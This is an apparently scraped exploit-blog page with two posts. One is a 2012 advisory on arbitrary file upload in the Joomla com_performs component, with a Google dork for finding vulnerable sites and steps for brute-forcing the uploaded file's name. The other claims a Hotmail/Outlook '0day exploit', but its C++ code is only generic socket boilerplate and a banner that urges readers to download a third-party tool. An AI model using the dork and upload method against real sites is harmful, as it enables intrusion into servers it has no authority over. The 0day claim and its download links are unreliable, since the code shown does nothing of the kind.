# Exploit Title: [Joomla Com_performs component arbitary file upload]# Google Dork: inurl:index.php?option=com_performs upload cv# Date: [2012-09-27]# Exploit Author: [Mormoroth]# Vendor Homepage: [http://www.performs.org.au/]# Version: [2.4 and prior]# Tested on: [Linux/Windows]------------Attacker can upload files with uploader formuploaded files go to /joomlaPath/media/uploadsthis form builder rename uploaded file with simple combinition between date and timefor example if you upload file it will renamed to >> 2012-09-28-20-05-Unknown-file.txt[2012-09-28] its current date and [20-05] is time of uploading file (Hour/Minute) And [Unknown] never change,after them your file nameby simple brute force you can find upload time which is hard part of guessing your exact uploaded file------------From Iran# 619EDDF21B6569C0 1337day.com [2013-09-01] 7FA32A6DFA150769 # |
Saturday, 31 August 2013
Joomla Component com_performs component arbitary file upload
Posted on 21:20 by Eagle Eye
Microsoft Hotmail or Outlook 0day exploit by squirrel sploit
Posted on 00:26 by Eagle Eye
/*Caution should read this :English Tutorial : http://www.youtube.com/watch?v=zfsBXz3lmRgFrench Tutorial : http://www.youtube.com/watch?v=X_HGCXajyVATo exploit this vulnerability you must Download Squirrel-sploit.English Tutorial : http://www.youtube.com/watch?v=zfsBXz3lmRgFrench Tutorial : http://www.youtube.com/watch?v=X_HGCXajyVA*/#include <stdio.h>#include <iostream>#include <windows.h>#include <winsock.h>#include <string>#include <direct.h>#pragma comment(lib, "wsock32.lib")using namespace std;#define SERVER_PORT 80void header();int createConnection(string targetAddr, int targetPort);int sendTransmission(string message);string recvTransmission();void cleanUp();WORD sockVersion;WSADATA wsaData;int sock;struct sockaddr_in rserver;//Setup the serverint createConnection(string serverIP, int port){ int result = 0, len = 0; sockVersion = MAKEWORD(1,1); WSAStartup(sockVersion, &wsaData); if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("error: socket()\n"); result = 1; } rserver.sin_family = AF_INET; rserver.sin_port = htons(port); rserver.sin_addr.s_addr = inet_addr(serverIP.c_str()); memset(&rserver.sin_zero, 0, 8); len = sizeof(struct sockaddr_in); if ((connect(sock, (struct sockaddr *)&rserver, sizeof(struct sockaddr_in))) == -1) { perror("error: connect()\n"); result = 1; } return result;}void header(){printf("________________________________________________________\n");printf(" ___ _ _ _ _ _ \n"); printf(" / __| __ _ _ _(_)_ _ _ _ ___| |___ ____ __| |___(_) |_ \n"); printf(" \__ \/ _` | || | | '_| '_/ -_) |___(_-< '_ \ / _ \ | _|\n"); printf(" |___/\__, |\_,_|_|_| |_| \___|_| /__/ .__/_\___/_|\__|\n"); printf(" |_| |_| \n"); printf("\n");printf("_________________________________________________________\n\n");printf("Download : sourceforge.net/projects/squirrelsploit/ \n\n");printf("Tutorial (English): youtube.com/watch?v=zfsBXz3lmRg \n\n");printf(" (French) : youtube.com/watch?v=X_HGCXajyVA \n\n");printf("set> stealmail xxxx@hotmail.com \n");}//Send a messageint sendTransmission(string message){ int bytes_sent = 0; bytes_sent = send(sock, message.c_str(), message.length(), 0); if (bytes_sent < 0) { perror("error: send()\n"); exit(1); } return bytes_sent;}//Receive a messagestring recvTransmission(){ string result; char *c = new char[1]; int bytes_recv = 0; while (c[0] != NULL) { bytes_recv = recv(sock, c, 1, 0); if (bytes_recv < 0) { perror("error: recv()\n"); //exit(1); } result += c[0]; } return result;}//Clean up the connectionvoid cleanUp(){ closesocket(sock); WSACleanup();}# 2497E0FBB782321B 1337day.com [2013-08-31] ED68B33B0E4103BB #
Categories: Exploit
